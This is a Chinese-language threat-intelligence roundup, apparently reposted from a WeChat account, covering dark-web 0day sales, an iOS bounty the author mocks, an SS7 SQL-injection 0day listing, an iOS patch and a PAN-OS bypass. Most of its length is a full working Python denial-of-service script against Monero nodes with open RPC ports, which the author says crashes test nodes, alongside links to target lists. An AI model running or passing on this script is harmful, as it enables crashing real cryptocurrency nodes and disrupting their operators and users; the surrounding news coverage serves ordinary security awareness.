近期暗网 0day 威胁情报预警

admin 2025年2月14日14:08:07评论47 views字数 5716阅读19分3秒阅读模式
近期暗网 0day 威胁情报预警

0day漏洞市场近期呈现双轨化发展态势,地下交易与合法渠道同步活跃:暗网市场中高频流转针对主流操作系统、虚拟化平台及工业控制系统的高危漏洞,而全球漏洞赏金市场规模已突破50亿,头部企业单漏洞奖励达百万级别,与此同时漏洞利用周期从披露到武器化平均压缩至7天,攻击面持续扩展(物联网设备漏洞同比激增300%,云原生架构漏洞占比超40%),但暗网市场存在虚假情报泛滥(占比约35%)、有效利用链不足20%、交易欺诈率28%等风险,常见传播手段包括夸大漏洞影响范围、伪造CVE编号/POC验证视频,建议企业通过加入权威漏洞情报平台、实施24小时动态补丁响应、部署覆盖率85%以上的虚拟补丁技术构建防御体系,个人用户需强化自动更新机制、配置EDR+防火墙+入侵检测的多层防护,并通过CVE官网/NVD数据库核验漏洞信息真实性。

下面的内容全当图一乐,切莫当真!!!

🚨 iOS 0day 高达1,000,000赏金! 🚨

近期暗网 0day 威胁情报预警

Zerozenx为绕过最新版本的iOS上的USB限制模式提供了100万美元的奖励。如果您是顶级安全研究人员,并且拥有可靠的利用,我们希望收到您的来信!

  • 💰 奖励:$ 1,000,000
  • 🔎 目标:iOS USB限制模式旁路
  • 📩 在这里提交: https://vrp.zerozenx.com

点评:感觉就是这么纯骗啊,即使真有,谁会发给你,谁信?🐶

暗网威胁行为者声称出售为Otello SS7的0day

SS7(七号信令系统),也称为七号信令系统(Signaling System Number 7),是一种被广泛应用于现代通信网络(如公共交换电话网和蜂窝通信网络)的共路信令系统。国际电信联盟推荐其为首选的标准信令系统.

近期暗网 0day 威胁情报预警

威胁行为者正在bf 论坛上以 50000 美金的价格出售基于 SQLi 的 oTello SS7 0Day,此 0Day 漏洞将允许在 SS7 服务器上执行 SQL注入,从而可以完全控制Web 面板。将接受 Dread 托管,付款仅接受xmr(门罗币) 支付。

Monero 0day DoS利用

大约4,5 个小时前,一个名为 WyRCV2 的组织在去中心化社交网络上发布了一条消息,可在以下链接中找到:https://primal.net/e/note1vzh0mj9rcxax9cgcdapupyxeehjprd68gd9kk9wrv939m8knulrs4780x7

Monero 零日漏洞和利用

与我们一起关闭 XMR 网络,让未来变得更美好。 保存、共享、使用。

https://anonpaste.org/?cccb7639afbd0650#HaMQAfzFdCqMDh9MwNuGRGUBXLgtk5yHWdAzS7MbvEVN

粘贴链接包含攻击者指示瞄准的节点列表,以及利用攻击的 Python 代码。根据他们的解释,预计此漏洞将在 Monero 的下一个版本中得到修补。任何暴露其 RPC 端口的 Monero 节点都容易受到内存耗尽的影响。

我可以确认 Python 代码可以正常工作,并且将其用于测试节点会导致因内存耗尽而崩溃。该代码非常简单,因为它会发送大量请求而不尝试读取响应,导致 Monero 将它们无限期地保存在内存中,直到崩溃发生。

攻击者声称已经关闭了 8 个公共节点和 1 个种子节点,该节点用作新节点连接到网络的会合点。

攻击代码

"""
ZERONERO DoS Exploit by WyRCV2 :3

Feel free to use this Python script to destroy any Monero node with its RPC port open.

This simply calls a very memory-exhaustive RPC request in a loop without asking the response. This will cause the node to crash.
"
""

import asyncio
import threading
from math import ceil
import time
import argparse
import os

HTTP_REQUEST = "GET /json_rpc HTTP/1.1rn
User-Agent: zeronero/1 (WyRCV2 for the W)rn
Cookie: truth=exterminating the xmr cockroachrn
Accept: */*rn
Content-Type: application/jsonrn
Content-Length: 61rn
rn
{"method":"get_output_distribution","params":{"amounts":[0]}}"


stop_event = threading.Event()
refused_lock = threading.Lock()
REFUSED = 0

async def spam_request(socket_id, host, port, loop_sleep, n_sockets):
    global REFUSED

    while not stop_event.is_set():
        try:
            reader, writer = await asyncio.open_connection(host, port)
            print(f"Socket {socket_id}: Connected to {host}:{port}. Requesting...")

            while not stop_event.is_set():
                writer.write(HTTP_REQUEST.encode('utf-8'))
                await writer.drain()
                print(f"Socket {socket_id}: Data sent successfully.")
                await asyncio.sleep(loop_sleep)

            print(f"Socket {socket_id}: Stop signal received, closing connection.")
            writer.close()
            await writer.wait_closed()

        except Exception as ex:
            if isinstance(ex, ConnectionRefusedError):
                with refused_lock:
                    REFUSED += 1
                    current_refused = REFUSED
                    print(f"Socket {socket_id}: Connection refused. Global REFUSED count = {current_refused}")
                    if current_refused >= n_sockets:
                        print("All socket connections were refused. Attack was successful. Signaling stop.")
                        stop_event.set()
                    else:
                        print(f"Socket {socket_id}: Error occurred: {ex}")

def start_event_loop(coroutines, thread_id):
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    try:
        print(f"Thread {thread_id} starting with {len(coroutines)} coroutines.")
        loop.run_until_complete(asyncio.gather(*coroutines))
    finally:
        loop.close()
        print(f"Thread {thread_id} event loop closed.")

def parse_args():
    parser = argparse.ArgumentParser(description="ZERONERO DoS Exploit by WyRCV2 :P")
    parser.add_argument("--host"type=str, help="Target host")
    parser.add_argument("--port"type=int, help="Target port")
    parser.add_argument("--n_sockets"type=int, default=10, help="Total number of socket connections (default: 10)")
    parser.add_argument("--n_threads"type=int, default=os.cpu_count(), help="Number of threads (default: number of CPU cores)")
    parser.add_argument("--loop_sleep"type=float, default=0.10, help="Sleep time between write (seconds, default: 100 milliseconds)")
    parser.add_argument("--run_duration"type=float, default=300.0, help="Total run duration before stopping coroutines (seconds, default: 300.0)")
    return parser.parse_args()

def main():
    print("ZERONERO DoS Exploit by WyRCV2 :P")
    args = parse_args()

    all_coroutines = [
        spam_request(
            socket_id=i,
            host=args.host,
            port=args.port,
            loop_sleep=args.loop_sleep,
            n_sockets=args.n_sockets,
        ) for i in range(1, args.n_sockets + 1)
    ]

    coroutine_per_thread = ceil(len(all_coroutines) / args.n_threads)

    threads = []
    for thread_idx in range(args.n_threads):
        start_index = thread_idx * coroutine_per_thread
        end_index = start_index + coroutine_per_thread
        coroutine_slice = all_coroutines[start_index:end_index]
        if coroutine_slice:
            thread = threading.Thread(target=start_event_loop, args=(coroutine_slice, thread_idx + 1))
            threads.append(thread)
            thread.start()

    try:
        time.sleep(args.run_duration)
    except KeyboardInterrupt:
        print("Stopping coroutines.")
    finally:
        stop_event.set()

    for thread in threads:
        thread.join()

if __name__ == "__main__":
    main()

苹果发布了 18.3.1 的安全更新

苹果公司发布了iOS 18.3.1,这是一个紧急安全更新,以修补该公司所说的0day,该脆弱性是在目标和“极其复杂”攻击中被利用的。

Nginx/Apache 路径混淆导致 PAN-OS 中的身份验证绕过 (CVE-2025-0108)

https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/

poc里面也有。

原文始发于微信公众号(独眼情报):近期暗网 0day 威胁情报预警

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月14日14:08:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   近期暗网 0day 威胁情报预警https://cn-sec.com/archives/3740744.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息